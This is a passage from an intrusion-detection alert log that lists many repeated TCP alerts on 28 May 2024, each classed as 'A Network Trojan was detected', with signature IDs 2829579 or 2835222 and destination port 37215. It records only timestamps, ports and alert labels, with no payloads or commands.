            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.851050
            SID:2829579
            Source Port:53558
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.564988
            SID:2835222
            Source Port:46754
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.039700
            SID:2829579
            Source Port:50838
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.766476
            SID:2829579
            Source Port:34170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:19.019210
            SID:2829579
            Source Port:48666
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.314422
            SID:2829579
            Source Port:39486
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.944948
            SID:2829579
            Source Port:58020
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.935177
            SID:2835222
            Source Port:36102
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.849251
            SID:2835222
            Source Port:54080
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.927674
            SID:2835222
            Source Port:43054
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.904977
            SID:2829579
            Source Port:36380
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.424249
            SID:2835222
            Source Port:56600
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.556323
            SID:2829579
            Source Port:54048
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.434615
            SID:2835222
            Source Port:55618
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.742622
            SID:2835222
            Source Port:47092
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.828279
            SID:2835222
            Source Port:47270
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.804415
            SID:2835222
            Source Port:56052
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.955841
            SID:2829579
            Source Port:37602
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.201589
            SID:2835222
            Source Port:47264
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.309454
            SID:2835222
            Source Port:57818
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.812141
            SID:2835222
            Source Port:53346
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.744646
            SID:2829579
            Source Port:50504
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.952978
            SID:2829579
            Source Port:49586
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.645094
            SID:2829579
            Source Port:54762
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.778741
            SID:2835222
            Source Port:56332
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:46.622283
            SID:2829579
            Source Port:36888
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.746789
            SID:2829579
            Source Port:35096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777102
            SID:2835222
            Source Port:47604
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.924970
            SID:2835222
            Source Port:40248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.966790
            SID:2829579
            Source Port:35442
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.948965
            SID:2829579
            Source Port:47284
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.853805
            SID:2829579
            Source Port:42234
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.928761
            SID:2835222
            Source Port:58956
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.634550
            SID:2835222
            Source Port:37174
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:17.006125
            SID:2829579
            Source Port:34496
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.532177
            SID:2835222
            Source Port:43636
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.541795
            SID:2829579
            Source Port:46140
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.922453
            SID:2829579
            Source Port:43770
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.707620
            SID:2829579
            Source Port:57594
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.555104
            SID:2835222
            Source Port:48150
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.775713
            SID:2835222
            Source Port:35714
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.847660
            SID:2829579
            Source Port:34872
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.847032
            SID:2835222
            Source Port:39550
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:33.406124
            SID:2835222
            Source Port:55418
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.721997
            SID:2835222
            Source Port:52452
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.714885
            SID:2829579
            Source Port:42740
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:42.499762
            SID:2835222
            Source Port:34740
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.668196
            SID:2835222
            Source Port:38466
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.854119
            SID:2829579
            Source Port:46430
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.926901
            SID:2829579
            Source Port:38826
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.748691
            SID:2835222
            Source Port:34954
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.541612
            SID:2835222
            Source Port:54896
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.948712
            SID:2829579
            Source Port:57604
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.809794
            SID:2835222
            Source Port:50674
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.709889
            SID:2829579
            Source Port:37298
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.559713
            SID:2835222
            Source Port:60682
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.034907
            SID:2829579
            Source Port:50756
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.773882
            SID:2829579
            Source Port:60588
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.868290
            SID:2829579
            Source Port:50332
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.730237
            SID:2829579
            Source Port:60434
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.004886
            SID:2829579
            Source Port:46018
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507449
            SID:2835222
            Source Port:57874
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.985008
            SID:2835222
            Source Port:55912
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.936829
            SID:2835222
            Source Port:43314
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.834094
            SID:2835222
            Source Port:57616
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.851135
            SID:2835222
            Source Port:52372
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.591616
            SID:2829579
            Source Port:43156
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.045306
            SID:2835222
            Source Port:41194
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.776299
            SID:2835222
            Source Port:56946
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.047517
            SID:2835222
            Source Port:42170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.849425
            SID:2829579
            Source Port:51138
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.387149
            SID:2829579
            Source Port:43728
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.510226
            SID:2829579
            Source Port:37092
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.871427
            SID:2835222
            Source Port:54558
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.676497
            SID:2835222
            Source Port:34176
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:40.541782
            SID:2829579
            Source Port:37580
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.371143
            SID:2835222
            Source Port:52724
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:35.446917
            SID:2835222
            Source Port:60206
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.986933
            SID:2835222
            Source Port:51892
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.612157
            SID:2829579
            Source Port:60628
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.944222
            SID:2829579
            Source Port:55038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.872303
            SID:2829579
            Source Port:39422
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.927265
            SID:2835222
            Source Port:47358
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.815165
            SID:2835222
            Source Port:49782
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.849372
            SID:2835222
            Source Port:51772
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.576000
            SID:2835222
            Source Port:52360
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.864680
            SID:2835222
            Source Port:51620
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.309544
            SID:2829579
            Source Port:45742
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.310410
            SID:2829579
            Source Port:45282
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.305521
            SID:2835222
            Source Port:40338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.899902
            SID:2835222
            Source Port:56796
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.515813
            SID:2829579
            Source Port:38756
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.745987
            SID:2829579
            Source Port:59394
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.990091
            SID:2829579
            Source Port:38272
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.909933
            SID:2835222
            Source Port:57260
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.865874
            SID:2835222
            Source Port:54358
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.984521
            SID:2835222
            Source Port:56846
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.377151
            SID:2835222
            Source Port:33016
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.532278
            SID:2835222
            Source Port:42604
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.050607
            SID:2835222
            Source Port:36200
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:15.943005
            SID:2829579
            Source Port:36844
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.779193
            SID:2835222
            Source Port:59464
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767380
            SID:2835222
            Source Port:33280
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.887203
            SID:2829579
            Source Port:54466
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.847505
            SID:2835222
            Source Port:50488
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.059610
            SID:2829579
            Source Port:49966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:39.480363
            SID:2835222
            Source Port:52878
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.939320
            SID:2829579
            Source Port:38210
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:01.873246
            SID:2829579
            Source Port:39116
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.850476
            SID:2835222
            Source Port:43148
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.919968
            SID:2829579
            Source Port:38680
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.761504
            SID:2835222
            Source Port:57678
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.578797
            SID:2829579
            Source Port:53322
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.952726
            SID:2835222
            Source Port:34522
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.929930
            SID:2829579
            Source Port:56816
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.558941
            SID:2835222
            Source Port:46162
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.042591
            SID:2829579
            Source Port:33456
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:46.563369
            SID:2829579
            Source Port:39446
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.066024
            SID:2829579
            Source Port:39060
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.024541
            SID:2829579
            Source Port:58966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.936157
            SID:2829579
            Source Port:45808
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.707512
            SID:2835222
            Source Port:36276
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.486067
            SID:2829579
            Source Port:54438
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.565081
            SID:2829579
            Source Port:54304
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:04.899470
            SID:2835222
            Source Port:57494
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.940711
            SID:2835222
            Source Port:44486
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.933087
            SID:2829579
            Source Port:50398
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.581541
            SID:2835222
            Source Port:34328
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.020413
            SID:2829579
            Source Port:37968
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:39.517590
            SID:2829579
            Source Port:57640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:51.665122
            SID:2835222
            Source Port:52244
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.277038
            SID:2829579
            Source Port:47192
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767257
            SID:2829579
            Source Port:39484
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.706343
            SID:2829579
            Source Port:37308
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.997982
            SID:2835222
            Source Port:54828
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.766647
            SID:2829579
            Source Port:50304
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.322742
            SID:2829579
            Source Port:36576
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.491337
            SID:2829579
            Source Port:52954
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.731394
            SID:2835222
            Source Port:52552
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.605198
            SID:2835222
            Source Port:60444
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.934046
            SID:2829579
            Source Port:48326
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.469847
            SID:2835222
            Source Port:47024
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.811940
            SID:2829579
            Source Port:45946
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:34.431491
            SID:2829579
            Source Port:36038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.902150
            SID:2835222
            Source Port:60906
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767130
            SID:2835222
            Source Port:38016
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.047572
            SID:2829579
            Source Port:58520
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.697202
            SID:2835222
            Source Port:44710
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.073338
            SID:2835222
            Source Port:44108
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.584391
            SID:2829579
            Source Port:36914
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.996428
            SID:2835222
            Source Port:57200
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.759631
            SID:2829579
            Source Port:38962
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.942402
            SID:2829579
            Source Port:47180
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.025449
            SID:2835222
            Source Port:45560
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.769730
            SID:2835222
            Source Port:59934
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.459456
            SID:2835222
            Source Port:56980
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.975193
            SID:2835222
            Source Port:37880
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.905586
            SID:2829579
            Source Port:47300
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.280238
            SID:2829579
            Source Port:57608
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.790107
            SID:2829579
            Source Port:45284
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.771323
            SID:2829579
            Source Port:46520
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.850422
            SID:2829579
            Source Port:57298
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.815514
            SID:2835222
            Source Port:39542
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.956869
            SID:2835222
            Source Port:57182
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.807723
            SID:2835222
            Source Port:54868
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.759436
            SID:2829579
            Source Port:33936
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.039808
            SID:2835222
            Source Port:48038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:39.498365
            SID:2829579
            Source Port:53992
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.849783
            SID:2829579
            Source Port:44794
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.805109
            SID:2829579
            Source Port:46750
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507828
            SID:2835222
            Source Port:37416
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.934145
            SID:2829579
            Source Port:33416
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:15.006107
            SID:2835222
            Source Port:55146
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.810688
            SID:2829579
            Source Port:55062
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.863467
            SID:2829579
            Source Port:36328
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.309882
            SID:2829579
            Source Port:52708
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.697558
            SID:2829579
            Source Port:35662
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.721916
            SID:2829579
            Source Port:59828
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.893430
            SID:2829579
            Source Port:36226
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.302172
            SID:2829579
            Source Port:41198
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.660891
            SID:2829579
            Source Port:60294
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.927010
            SID:2829579
            Source Port:43706
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.770934
            SID:2835222
            Source Port:46030
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.849587
            SID:2835222
            Source Port:60376
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:16.999944
            SID:2829579
            Source Port:41334
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857537
            SID:2835222
            Source Port:59638
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.895894
            SID:2835222
            Source Port:40042
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.863492
            SID:2829579
            Source Port:59328
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.056937
            SID:2829579
            Source Port:58450
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.854611
            SID:2829579
            Source Port:48694
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.777648
            SID:2835222
            Source Port:55186
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.992597
            SID:2835222
            Source Port:41702
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.468436
            SID:2829579
            Source Port:41348
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.905788
            SID:2835222
            Source Port:46348
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.311520
            SID:2835222
            Source Port:59576
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.987026
            SID:2835222
            Source Port:41798
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.919098
            SID:2829579
            Source Port:42500
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
